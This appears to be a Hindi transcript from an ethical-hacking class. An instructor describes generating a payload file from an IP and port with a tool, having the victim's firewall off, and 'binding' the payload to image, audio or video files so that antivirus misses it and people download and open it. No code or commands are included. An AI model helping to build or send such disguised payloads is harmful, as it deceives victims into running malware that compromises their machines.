हेल्प ऑफ सेम कमांड्स। वैसे मैं कमांड्स की लिस्ट भी आपको सेंड कर दूंगी। उसके बाद क्या होगा कि ये तो हमने क्या करा था, काली के थ्रू करा था। अब मैं आपको क्या है कि कल जो हम ये वाला पार्ट करने के बाद प्रोसेसिंग रिवीजन, आफ्टर दैट मैं आपको टूल के थ्रू कराऊंगी। उस टूल के थ्रू क्या होगा, आपको कोई कमांड्स लिखने की जरूरत नहीं होंगे, सीधे सीधे आपको क्या करना है, एक आईपी देनी है, आईपी के बाद पोर्ट नंबर देना और रन कर देना, वो डायरेक्टली अपने आप ही फाइल बना देगा और फिर आपको बस शेयर करनी रह जाएगी, ये सारे कमांड्स का झंझट हट जाता है। ठीक है, लेकिन आना हमको दोनों तरीके से चाहिए, इफ अगर वो वाला टूल काम नहीं करे या कुछ ऐसा हो इस वजह से। तो अभी मैं आपको रिकॉर्डिंग शेयर करती हूँ, आप एक बार प्रैक्टिस करिएगा। कल पहले यहाँ तक रिवीजन कर लेंगे, फिर कल मैं आपको टूल भी बता दूंगी वो। ठीक है मैम, इसके लिए फायरवॉल ऑफ ही होना चाहिए क्या? हाँ बेसिकली क्या है ना, फायरवॉल ऑफ होना चाहिए, एंटीवायरस जो बाईपासिंग होगी ना वो हम लोग अभी नहीं कर सकते, क्योंकि वो हमारे बेसिक में नहीं आती है, वो आएगी जब आप थोड़ा हायर कर लेंगे ना, एथिकल हैकिंग कर लिए, फिर थोड़ा सा वेब पेनिट्रेशन टेस्टिंग की नॉलेज हो गई, तो आफ्टर दैट फायरवॉल कोर्सेज होते हैं, उसमें आपको फायरवॉल बाईपासिंग करना सिखाया जाता है, वो इसका पार्ट नहीं होता। लेकिन इसमें क्या है कि जब हम लोग, मैं आपको टूल सिखाऊंगी कल, तो टूल के साथ मैं आपको एक और टूल सिखाऊंगी जिसमें क्या है, बाइंडिंग कर सकते हैं। बाइंडिंग इन द सेंस कि आपने क्या करा, कोई इमेज फाइल ले ली या फिर आपने क्या करा, कोई ऑडियो या वीडियो फाइल ले ली और उसके साथ बाइंड करके भेज दिया, तो तब क्या होता, तब एंटीवायरस कम मतलब क्या होता है, उसको डिटेक्ट नहीं कर पाता। तो मोस्ट ऑफ द लोग डाउनलोड कर लेते हैं हमारी ऑडियो और वीडियो फाइल, क्योंकि उनको क्लिक करना है वीडियो चल जाती है, तो डिटेक्शन में नहीं आ पाता, तो वो मैं आपको कल दोनों टूल सिखा दूंगी। ठीक है, अभी तक का कोई डाउट है तो आप पूछ लीजिए। ठीक है, तो मैं भी आपको रिकॉर्डिंग शेयर करती हूँ और आपको नोट्स शेयर करती हूँ जो इसके कमांड्स। ठीक है, ठीक, ओके, थैंक यू।